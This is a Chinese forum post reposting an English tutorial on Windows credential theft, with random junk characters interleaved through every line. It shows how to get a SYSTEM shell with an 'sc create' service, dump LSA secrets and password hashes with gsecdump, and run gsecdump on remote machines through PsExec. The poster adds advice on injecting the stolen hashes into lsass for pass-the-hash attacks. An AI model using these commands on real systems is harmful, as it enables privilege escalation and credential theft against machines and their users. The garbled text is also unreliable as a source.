o get a DOS Prompt as NT system:9 Z/ H4 t/ y* v0 ~
( O {# Q8 j* K" q- ~
C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact! L$ @0 L0 M$ h! @8 S# k
[SC] CreateService SUCCESS
2 x! e- u( C* `0 d: a: c, @& q, Z7 m5 s! k( X* Z
C:\>sc start shellcmdline* D4 X B% h1 v k* Z; T) s
[SC] StartService FAILED 1053:
; `6 R- @3 |: Z ]' t
5 J, N. j/ i/ r' k8 H5 O; K- eThe service did not respond to the start or control request in a timely fashion.' y$ W K# o1 @7 Q+ \( O- w
- `- w- N, ~1 j, N0 _9 C, FC:\>sc delete shellcmdline& ^7 A+ @' h+ L' `' W
[SC] DeleteService SUCCESS5 I/ \1 z9 R. H ~9 v/ A
1 i2 U' n3 W7 W$ `( h0 V" h
------------ O" {1 Q, m5 H% m. @0 \
% O" s9 j) I* f' _
Then in the new DOS window:
0 ~! k4 a% L6 x% _* T- S/ s6 r5 O6 X
Microsoft Windows XP [Version 5.1.2600]/ n! h( f# v9 ^' ^2 d% q x( {
(C) Copyright 1985-2001 Microsoft Corp.& s; ~4 J7 Z @/ Q7 n
6 y" l8 ~; n- J) Y, ]; P8 ?% mC:\WINDOWS\system32>whoami0 I, ^/ S3 e# Y7 t8 `* e
NT AUTHORITY\SYSTEM* W% f' g# F$ U* f r" g) d
, u: y) o" G/ k1 |- ~9 ]# M
C:\WINDOWS\system32>gsecdump -h$ S, r3 M% J. r3 |/ c) b
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)* H- ^7 |2 j; }
usage: gsecdump [options]: Q! i5 i2 n. W5 E9 R
. W# b+ F( l9 b$ Ioptions:7 `; M& e% r+ B2 @: S, T7 \
-h [ --help ] show help# d- u! H( S9 Y8 j- }$ E
-a [ --dump_all ] dump all secrets
( S, g9 ~0 a( C: J) x- Q-l [ --dump_lsa ] dump lsa secrets5 U: s) _% w$ b- `& n$ {4 P% x* @
-w [ --dump_wireless ] dump microsoft wireless connections
9 l6 L7 P9 t1 C* T1 P$ z-u [ --dump_usedhashes ] dump hashes from active logon sessions2 s1 E# | V8 v {' E) L, D# E
-s [ --dump_hashes ] dump hashes from SAM/AD0 ?; _+ x: G) R% p0 ] s
5 u. t" ?. }- k; P" AAlthough I like to use:/ W# C* [% r7 B; D9 S9 c4 H8 X
) Y9 R: P" B" x4 v* \2 G
PsExec v1.83 - Execute processes remotely
3 Y; U7 l% n6 y o/ V6 x& b) uCopyright (C) 2001-2007 Mark Russinovich r, v, }$ }' m- v
Sysinternals - 链接标记[url]www.sysinternals.com[/url]$ [' R `, ~3 c: ~$ i' m) O
4 C7 o O7 W/ @3 ?$ {C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT' N" k" f" U& U- v
& T- a4 _1 T3 h8 `8 M: n' xto get the hashes from active logon sessions of a remote system.) b+ P% n7 r, y* a% Q8 ]
/ _' e/ _6 f6 F3 N Q; D6 ZThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
2 W& |3 v* F: E+ X n1 e# B5 F$ H" f7 i. T7 n$ _5 h
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
5 h5 S1 f. q1 i7 Y4 d: Y7 h原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]' G0 g% ?1 d- S. F1 ^; \
9 q$ Q( u0 P% W# f8 m6 b0 @1 J+ \$ u我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。, h2 ?0 Y- x3 h( t4 S( o
|
发表于 2012-11-6 21:09:29
收藏
支持
反对